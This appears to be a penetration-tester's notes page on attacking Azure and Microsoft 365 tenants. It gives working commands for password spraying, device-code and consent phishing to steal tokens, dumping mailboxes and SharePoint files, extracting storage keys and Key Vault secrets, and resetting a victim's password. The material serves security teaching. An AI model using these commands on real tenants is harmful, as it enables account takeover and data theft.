📖
sheepwall
  • Overview
  • Cloud Hacking
    • Azure
  • Hacking
    • Recon
      • Nmap
      • Website Recon
      • Service Enumeration
    • Exploitation
      • GraphQL
      • Application Attacks
      • Web Server Attacks
      • JSON attacks
      • CMS attacks
      • SQL Injection
      • Cross Site Scripting
      • Command Injection
      • SSRF
      • SSTI
      • Server Includes
      • XXE
      • WSDL/SOAP
      • Serialization Attacks
      • Cryptography
      • JWT
    • Installation
      • File Uploads
      • File Transfers
    • Actions on Objectives
      • Networking
      • Linux
    • Tools
    • Windows
      • 1. Getting Foothold
      • 2. Windows Exploitation
      • 3. Enumerating Active Directory
      • 4. Dumping Credentials
      • 5. Lateral Movement
      • 6. Persistence
      • 7. Active Directory
      • 8. LAPS
  • Bug Bounties
    • SSRF to Envoy Admin Page
    • Leaky Error Messages
    • HTTP verb tampering results in administrator role to the application
  • APT Information
    • DFIR Summary
Powered by GitBook
On this page
  • Getting Access
  • Brute Forcing
  • Phishing Links
  • A note about tokens
  • Enumeration using Tokens
  • Email dumping
  • SharePoint dumping
  • Enumeration using Credentials
  • Logging In
  • Enumerating Resources
  • Listing Roles
  • Listing Users
  • Listing Groups
  • Listing Roles in Azure AD
  • Access Password Vaults
  • Requesting for Tokens
  1. Cloud Hacking

Azure

PreviousCloud HackingNextRecon

Last updated 1 year ago

Getting Access

The first part of Azure pentesting is trying to get access.

This can be done via various methods

  1. Brute forcing accounts

  2. Phishing for tokens

  3. Connecting to public resources that may contain credentials

Brute Forcing

We can use MSOL-Spray to spray a password for different accounts

Import-Module .\MSOLSpray-master\MSOLSpray.ps1


Invoke-MSOLSpray -UserList .\userlist.txt -Password Password123

[*] There are 5 total users to spray.
[*] Now spraying Microsoft Online.
[*] Current date and time: 04/18/2022 14:22:05

Phishing Links

There are two ways to phish for tokens

  1. Token Tactics

  2. Illicit Consent Attacks

Token Tactics

We can use Token Tactics to generate a phishing link to send to the user

Import-Module .\TokenTactics-main\TokenTactics.psd1

> Get-AzureToken -Client MSGraph

user_code : C4UJUN7B3
device_code : CAQABAAEAAAD--DLA3VO7Qr…
verification_url : https://microsoft.com/devicelogin
expires_in : 900
interval : 5
message : To sign in, use a web browser to open the page
https://microsoft.com/devicelogin and enter the code C4UJUN7B3 to
authenticate.
authorization_pending

Now we send the email to the target

When victim clicks and enters the code, we will get his access token

Illicit Consent Attacks

This method of attack assumes you have already breached the portal, and we can further elevate our privileges by creating an application with excessive RW permissions, and trick a user to consenting the application to access data on their behalf.

There are some pre-requisites to this

In the portal, it should say that users can register applications

In User Consent Settings for Enterprise Applications, it should be configured such that users can allow consent for apps

Now we can create an application, and grant it excessive delegated permissions such as reading all data, users and files.

We then need to configure 365-Stealer

Enter the Application ID, Application Secret and Return URL

Now we run the server, and when the user clicks consent to the application, we can get their token with all the delegated permissions we obtained earlier

python .\365-Stealer.py --run-app

A note about tokens

I've written a short blog post here to describe the tokens and their related permissions

Enumeration using Tokens

Once we have access and we have the tokens of the users, we can start enumerating to see what other resources we can access

We can do this via accessing Emails or SharePoint resources

Email dumping

We use Token Tactics again to dump emails using the access token

Import-Module .\TokenTactics-main\TokenTactics-main\TokenTactics.psd1

Dump-OWAMailboxViaMSGraphApi -AccessToken $access_token -mailFolder AllItems

SharePoint dumping

Listing files in SharePoint

$Token =
'eyJ0eXAiOiJKV1QiLCJub25jZSI6InNkZENGd2gzbDlqampfeXhjU0VtLTI1VUlRN0gzc29Ka
2tiZnVMR3BrT1kiLCJhbGciOiJSUzI1NiIsIn[...]RGpfNTJ2YndHTmd2UU8yVnpNYyIsImtp
ZCI6ImpTMVhvMU9XRGpfNTJ2YndHTmd2UU8yVnpNYyJ9.eyJhdWQiOiJod'

$URI = 'https://graph.microsoft.com/v1.0/me/drive/root/children'

$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{ 'Authorization' = "Bearer $Token" } }

(Invoke-RestMethod @RequestParams).value

If we see a resource with download links at @microsoft.graph.downloadUrl, we can visit the URL to download the file

Enumeration using Credentials

If we have user credentials obtained from Brute Forcing, Dumping emails and SharePoint enumeration, we can do deeper enumeration of the Azure Environment

We can either use Azure CLI, or Azure PowerShell cmdlets

The functionalities between these two approaches are similar, with each tool having slightly unique capabilites

Logging In

Logging in with normal user credentials

az login -u "user@domain.com" -p "password"
--allow-no-subscriptions
$password = ConvertTo-SecureString 'password' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('user@domain.com', $password)

Connect-AzAccount -Credential $creds

Logging in with SPN accounts

In order to authenticate with SPN, we need the following:

  1. Client ID

  2. Client Secret

  3. Tenant ID

Client ID and Secret should be obtained via other forms of resource enumeration.

We can get Tenant ID by visiting https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration

For example

https://login.microsoftonline.com/dummy.onmicrosoft.com/.well-known/openid-configuration

Now we can login

az login --service-principal -u <client ID> -p <client Secret> --tenant <Tenant ID>
$password = ConvertTo-SecureString <client secret> -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential(<client ID>, $password)

Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant <tenant ID>

Enumerating Resources

az resource list
Get-AzResource

In the event where you see a container, but the resources are not being shown due to permission issues, we can download them to our local machine instead

# 1. to get the name of the storage
az storage account list 

# 2. get the keys for the storage
 az storage account keys list --account-name "storagename"

# 3. get the container name
az storage container list --account-name "storagename" --account-key <key_value>  

# 4. download all files in the container
az storage blob download-batch -d . -s mycontainer --account-name "storagename" --account-key <key value>

Or, we can use Storage Explorer.exe to connect to subscriptions or publicly accessible storage containers

Listing Roles

We need to look out for custom roles, which are user created non-standard roles which contain special privileges 

az role assignment list --all
az role definition list --custom-role-only
Get-AzRoleAssignment

Listing Users

Listing all users in the Azure AD

az ad user list
Get-AzADuser

Listing Groups

Getting groups on the AD, as well as group memberships

az ad group list
az ad group member list --group 01086658-6706-44e8-a373-96ab550c72f7
Get-AzADGroup
Get-AzADGroupMember -ObjectId 01086658-6706-44e8-a373-96ab550c72f7

Listing Roles in Azure AD

For this, we need to run Connect-AzureAD with the credentials

$password = ConvertTo-SecureString 'password' -AsPlainText -Force
$creds = New-Object
System.Management.Automation.PSCredential('user@domain.com', $password)

Connect-AzureAD -Credential $creds

Then we list available roles

Get-AzureADDirectoryRole

And list members who have the role

Get-AzureADDirectoryRole -ObjectId b5da7126-cb27-48e6-a316-e319ba453b65 | Get-AzureADDirectoryRoleMember

If we have a role that can reset passwords, we can do so with these commands

$password = "newpassword" | ConvertTo-SecureString -AsPlainText -Force

(Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@domain.com"}).ObjectId | Set-AzureADUserPassword -Password $Password -Verbose

Access Password Vaults

After listing resources, if we see password vaults, we can access the plain text passwords stored in them.

Vaults require special types of tokens to access. These tokens can be obtained with Azure CLI

az account get-access-token --resource https://vault.azure.net

Once we have the token, we use Azure PowerShell cmdlet to access the data

Connect-AzAccount -AccessToken $AccessToken -KeyVaultAccessToken $KeyVault -AccountId e763211c-0447-4a4f-9e9c-da98c94a5f40
Get-AzKeyVaultSecret -VaultName Secret-Vault

Get-AzKeyVaultSecret -VaultName Secret-Vault -Name passwords -AsPlainText

Requesting for Tokens

After we have authenticated as a user on Azure CLI, we can request for more token to access other services such as GraphAPI or Azure Password vaults

az account get-access-token --resource https://management.azure.com
az account get-access-token --resource https://vault.azure.net
az account get-access-token --resource https://graph.windows.net
LogoGitHub - dafthack/MSOLSpray: A password spraying tool for Microsoft Online accounts (Azure/O365). The script logs if a user cred is valid, if MFA is enabled on the account, if a tenant doesn't exist, if a user doesn't exist, if the account is locked, or if the account is disabled.GitHub
LogoGitHub - rvrsh3ll/TokenTactics: Azure JWT Token Manipulation ToolsetGitHub
LogoGitHub - AlteredSecurity/365-Stealer: 365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack.GitHub
LogoAzure Access TokensAzure Access Tokens
LogoAzure Storage Explorer – cloud storage management | Microsoft Azure